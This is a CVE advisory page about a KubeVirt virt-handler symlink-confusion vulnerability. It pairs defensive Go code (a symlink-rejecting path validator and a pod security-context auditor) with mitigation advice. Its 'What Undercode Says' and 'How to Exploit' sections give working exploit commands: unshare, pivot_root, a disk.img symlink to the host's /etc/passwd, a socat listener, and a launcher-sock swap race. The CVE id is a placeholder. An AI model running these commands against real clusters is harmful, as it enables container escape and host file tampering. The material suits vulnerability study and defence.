Kubevirt, Symlink Confusion, CVE-2024-XXXX (Critical)

How the mentioned CVE works:

The vulnerability is in the `virt-handler` component of Kubevirt. When a VirtualMachineInstance (VMI) is created or updated, `virt-handler` uses a socket file (`launcher-sock`) inside the `virt-launcher` pod to determine the pod's root filesystem mount point. The flaw is that `virt-handler` does not check whether `launcher-sock` is a symbolic link. An attacker who controls the `virt-launcher` pod's filesystem can replace the socket with a symlink to a socket they control in a different mount namespace. This tricks the `Detect` function and the subsequent `MountRoot()` call into misidentifying the root filesystem. When `hostDiskCreator` later runs to initialize disk images, it operates on files relative to this incorrect root, so the attacker can change the ownership of any host file to the `virt-launcher` user (UID 107) by manipulating a second symlink for a Persistent Volume Claim (PVC) named `disk.img`.
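The two missing checks described above (the socket is taken at face value, and the disk image is operated on without verifying what it is) can both be closed with the same rule: resolve the path under the expected root one component at a time with `Lstat`, refuse any symlink, and then confirm the final entry is the file type you expect. The following is an added example written for this page; it is not KubeVirt's own code, and the function names (`ValidateLauncherSocket`, `ValidateDiskImage`, `lstatNoFollow`) and the temporary directory layout it builds are illustrative assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"os"
	"path/filepath"
	"strings"
)

// ErrSymlink is returned when a path, or any component of it, is a symbolic link.
var ErrSymlink = errors.New("refusing to follow symbolic link")

// lstatNoFollow resolves rel underneath root one component at a time using
// os.Lstat, so a symlink planted anywhere along the path is reported instead
// of being followed. ".." components are rejected so rel cannot escape root.
func lstatNoFollow(root, rel string) (os.FileInfo, error) {
	cur := root
	var fi os.FileInfo
	for _, part := range strings.Split(filepath.Clean(rel), string(filepath.Separator)) {
		switch part {
		case "", ".":
			continue
		case "..":
			return nil, fmt.Errorf("path %q escapes root %q", rel, root)
		}
		cur = filepath.Join(cur, part)
		var err error
		if fi, err = os.Lstat(cur); err != nil {
			return nil, err
		}
		if fi.Mode()&os.ModeSymlink != 0 {
			return nil, fmt.Errorf("%w: %s", ErrSymlink, cur)
		}
	}
	if fi == nil {
		return nil, errors.New("empty relative path")
	}
	return fi, nil
}

// ValidateLauncherSocket checks that root/rel is a real unix socket reached
// without crossing a symlink; this is the check the text says is missing.
func ValidateLauncherSocket(root, rel string) error {
	fi, err := lstatNoFollow(root, rel)
	if err != nil {
		return err
	}
	if fi.Mode()&os.ModeSocket == 0 {
		return fmt.Errorf("%s is not a unix socket", filepath.Join(root, rel))
	}
	return nil
}

// ValidateDiskImage checks that root/rel is a regular file (not a symlink to
// something else) before any ownership change or initialisation touches it.
func ValidateDiskImage(root, rel string) error {
	fi, err := lstatNoFollow(root, rel)
	if err != nil {
		return err
	}
	if !fi.Mode().IsRegular() {
		return fmt.Errorf("%s is not a regular file", filepath.Join(root, rel))
	}
	return nil
}

func main() {
	// Constructed scratch layout mimicking the pod root: a real socket and a
	// symlink beside it. Nothing here touches a real KubeVirt installation.
	dir, err := os.MkdirTemp("", "kv-check")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	sockDir := filepath.Join(dir, "var", "run", "kubevirt", "sockets")
	if err := os.MkdirAll(sockDir, 0o755); err != nil {
		panic(err)
	}
	ln, err := net.Listen("unix", filepath.Join(sockDir, "launcher-sock"))
	if err != nil {
		panic(err)
	}
	defer ln.Close()
	_ = os.Symlink(filepath.Join(sockDir, "launcher-sock"), filepath.Join(sockDir, "evil-sock"))
	fmt.Println(ValidateLauncherSocket(dir, "var/run/kubevirt/sockets/launcher-sock")) // <nil>
	fmt.Println(ValidateLauncherSocket(dir, "var/run/kubevirt/sockets/evil-sock"))     // refusing to follow symbolic link: ...
}
```

Note that checking only the final component is not enough: a symlinked parent directory would let an attacker redirect the whole subtree, which is why the walk rejects symlinks at every level. On Linux, the same intent can be expressed at the syscall level with `O_NOFOLLOW`/`openat2` and `RESOLVE_NO_SYMLINKS`, but the component-wise `Lstat` walk is portable and easy to audit.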

DailyCVE Form:

Platform: Kubevirt
Version: < v1.2.0
Vulnerability: Symlink Confusion
Severity: Critical
Date: 2024-05-27

Prediction: 2024-07-15

What Undercode Says:

Enable unprivileged user namespaces (prerequisite)
sysctl -w kernel.unprivileged_userns_clone=1
Create isolated namespace environment
unshare --user --map-root-user --mount sh
Pivot root and set up symlinks
pivot_root . hostfs_root
ln -sf ../../../../../../../../../../../../hostfs_root/etc/passwd disk.img
socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -
Trigger the race condition
p=$(pgrep -af "/usr/bin/virt-launcher" | grep -v virt-launcher-monitor | awk '{print $1}')
ln -sf ../../../../../../../../../proc/2245509/root/tmp/bad.sock /proc/$p/root/var/run/kubevirt/sockets/launcher-sock

How to Exploit:

1. Gain filesystem access in the `virt-launcher` pod.
2. Create a malicious mount namespace with a pivoted root.
3. Set up a symlink for the PVC `disk.img` pointing to the target host file.
4. Start a socket listener on a controlled path.
5. Exploit the race condition during VMI creation by replacing `launcher-sock` with a symlink to the malicious socket.
6. `virt-handler` connects to the malicious socket and misidentifies the root mount.
7. Host file ownership is changed to UID 107.

Protection from this CVE:

Patch to v1.2.0 or later.

Restrict pod capabilities.

Enforce seccomp profiles.

Control the `kernel.unprivileged_userns_clone` sysctl on nodes.
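Two of the controls listed above (restricting capabilities and enforcing seccomp) are visible in a pod's `securityContext`, so they can be checked before a workload is admitted. The following is an added example for this page, not code from KubeVirt or any admission controller: it parses a trimmed-down PodSpec in JSON (struct names such as `PodSpec` and `AuditPodSpec` are this example's own; the real API types live in `k8s.io/api/core/v1`) and reports a finding for each container that runs privileged, adds capabilities, does not drop `ALL`, or has no seccomp profile at pod or container level. The `userns_clone` sysctl is a node setting, not part of the pod spec, so it is out of scope here. The two sample specs are constructed.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Minimal subset of the Kubernetes PodSpec needed for this audit (hypothetical
// struct definitions; the real API types live in k8s.io/api/core/v1).
type SeccompProfile struct {
	Type string `json:"type"`
}

type Capabilities struct {
	Add  []string `json:"add"`
	Drop []string `json:"drop"`
}

type SecurityContext struct {
	Privileged     *bool           `json:"privileged,omitempty"`
	Capabilities   *Capabilities   `json:"capabilities,omitempty"`
	SeccompProfile *SeccompProfile `json:"seccompProfile,omitempty"`
}

type Container struct {
	Name            string           `json:"name"`
	SecurityContext *SecurityContext `json:"securityContext,omitempty"`
}

type PodSpec struct {
	SecurityContext *SecurityContext `json:"securityContext,omitempty"`
	Containers      []Container      `json:"containers"`
}

// AuditPodSpec parses a PodSpec (JSON) and returns one finding per container
// per missing control: privileged mode, added capabilities, capabilities not
// dropped, and no (or an Unconfined) seccomp profile. A pod-level seccomp
// profile covers containers that set none of their own.
func AuditPodSpec(raw []byte) ([]string, error) {
	var spec PodSpec
	if err := json.Unmarshal(raw, &spec); err != nil {
		return nil, err
	}
	podSeccomp := spec.SecurityContext != nil &&
		spec.SecurityContext.SeccompProfile != nil &&
		spec.SecurityContext.SeccompProfile.Type != "Unconfined"

	var findings []string
	for _, c := range spec.Containers {
		sc := c.SecurityContext
		if sc == nil {
			sc = &SecurityContext{}
		}
		if sc.Privileged != nil && *sc.Privileged {
			findings = append(findings, c.Name+": privileged=true")
		}
		dropAll := false
		if sc.Capabilities != nil {
			for _, d := range sc.Capabilities.Drop {
				if d == "ALL" {
					dropAll = true
				}
			}
			for _, a := range sc.Capabilities.Add {
				findings = append(findings, c.Name+": adds capability "+a)
			}
		}
		if !dropAll {
			findings = append(findings, c.Name+": does not drop ALL capabilities")
		}
		switch {
		case sc.SeccompProfile != nil && sc.SeccompProfile.Type == "Unconfined":
			findings = append(findings, c.Name+": seccompProfile is Unconfined")
		case sc.SeccompProfile == nil && !podSeccomp:
			findings = append(findings, c.Name+": no seccomp profile at pod or container level")
		}
	}
	return findings, nil
}

// Constructed sample specs (not taken from any real deployment).
const weakSpec = `{"containers":[{"name":"compute","securityContext":{"privileged":true}}]}`
const hardenedSpec = `{"securityContext":{"seccompProfile":{"type":"RuntimeDefault"}},
 "containers":[{"name":"compute","securityContext":{"privileged":false,"capabilities":{"drop":["ALL"]}}}]}`

func main() {
	for _, s := range []string{weakSpec, hardenedSpec} {
		findings, err := AuditPodSpec([]byte(s))
		if err != nil {
			panic(err)
		}
		fmt.Printf("%d finding(s): %v\n", len(findings), findings)
	}
}
```

The weak spec yields three findings and the hardened one none. In practice the same checks are enforced cluster-wide with Pod Security Admission or a policy engine rather than a hand-written audit, but reading the spec directly shows exactly which fields those policies evaluate.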

Impact:

Host File Tampering

Data Confidentiality Loss

Container Escape

Host Integrity Compromise

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
